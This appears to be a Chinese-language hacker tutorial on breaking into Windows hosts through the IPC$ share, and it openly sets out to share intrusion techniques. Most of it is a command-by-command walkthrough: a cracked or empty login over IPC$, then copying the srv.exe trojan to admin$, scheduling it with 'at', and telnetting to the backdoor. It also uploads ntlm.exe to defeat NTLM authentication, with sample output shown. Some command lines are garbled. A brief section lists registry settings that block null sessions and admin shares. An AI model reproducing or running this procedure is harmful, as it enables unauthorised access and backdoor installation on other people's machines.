簡 介
在網(wǎng)入侵中，我總結(jié)一下，以下幾種常見漏洞入方法和補久措施。By:啤酒蓋 相傳，在神奇的網(wǎng)絡(luò)世界中，有一群習(xí)慣了晝伏夜出的人，他們崇尚自由，反對收費，不變的信念是共享，在那群人眼中，眾生皆平等，也沒有什么堅不可破的城墻，他們就是——黑客！今天我們把黑客經(jīng)常用到的經(jīng)典入侵技術(shù)與大家共享！ 一、 永恒的IPC$ 　　入侵難度：★★★（中等） 　　存在范圍：★★★（中等） 　　危險指數(shù)：★★★★★（很高） 　　使用幾率：★★★★★（很高） 　　好用指數(shù)：75% 　　編輯部評審意見： 　　眾所周知，安全問題是一個極具時效的問題，就拿兩年前百試不爽的.printer溢出和unicode來說吧，在本年度基本上就沒怎么再見有還用！ 　　然而似乎也有例外，針對IPC$問題的攻擊就常用常新。 　　什么是IPC$漏洞： 　　IPC$是共享“命名管道”的資源，主要用于程序間的通訊。在遠程管理計算機和查看計算機的共享資源時使用。利用默認的IPC$我們可以與目標(biāo)主機建立一個空的連接（無需用戶名與密碼），而利用這個空的連接，我們就可以得目標(biāo)主機上的用戶列表。 　　我們總在說ipc$漏洞ipc$漏洞，其實，ipc$并不是真正意義上的漏洞，它是為了方便管理員的遠程管理而開放的遠程網(wǎng)絡(luò)登陸功能，而且還打開了默認共享，即所有的邏輯盤(c$，d$，e$……)和系統(tǒng)目錄winnt或windows(admin$)。 　　所有的這些，初衷都是為了方便管理員的管理，但好的初衷并不一定有好的收效，一些別有用心者(到底是什么用心?我也不知道，代詞一個)會利用IPC$，訪問共享資源，導(dǎo)出用戶列表，并使用一些字典工具，進行 密碼探測，寄希望于獲得更高的權(quán)限，從而達到不可告人的目的。 　　攻擊工具： 　　掃描軟件：流光4.71 　　木馬軟件：srv.exe 　　簡單攻擊： 　　1. 打開流光4.71 　　2. 進行掃描前的設(shè)置 　　3. 假設(shè)掃出127.0.0.1存在ipc$漏洞，我們進行如下操作 　　C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" //這是用流光掃到的密碼 　　C:\>copy srv.exe $">\\127.0.0.1\admin$ //先復(fù)制srv.exe上去，在流光的Tools目錄就有 　　出現(xiàn)如下提示： 　　c:\winnt\system32\ 　　已復(fù)制 1 個文件 　　C:\>net time \\127.0.0.1 //查時間，這里的時間是指對方計算機的，也就是我們要入侵的127.0.0.1的時間，還有要提醒大家要注意的一點是，請把時間轉(zhuǎn)換為24小時制 　　C:\>at \\127.0.0.1 11:05 srv.exe //用at命令啟動srv.exe 　　C:\>net time \\127.0.0.1 //再查查夠時間沒有 　　C:\>telnet 127.0.0.1 99 //我們telnet吧，注意端口是99，因為這里我們用的是srv.exe。 　　C:\>copy ntlm.exe $">\\127.0.0.1\admin$ //我們再開一個DOS窗口，把ntlm.exe上傳到主機上，在流光的tools目錄有 　　C:\WINNT\system32>ntlm //運行，破壞對方機器的ntlm驗證模式，使我們能通過直接連接對方的telnet模式。 　　C:\WINNT\system32> 　　C:\WINNT\system32>net start telnet //然后直接用net start telnet啟動telnet 　　Telnet 服務(wù)器正在啟動. 　　Telnet 服務(wù)器已經(jīng)啟動成功。 \ C //成功 　　這時我們就可以直接使用TELNET 127.0.0.1連接對方了。 　　至此入侵結(jié)束。 　　如何防御： 　　1. 禁止建立空連接 　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 　　RestrictAnonymous = DWORD:00000001 　　2. 禁止管理共享 　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 　　AutoShareServer = DWORD:00000000

最新評論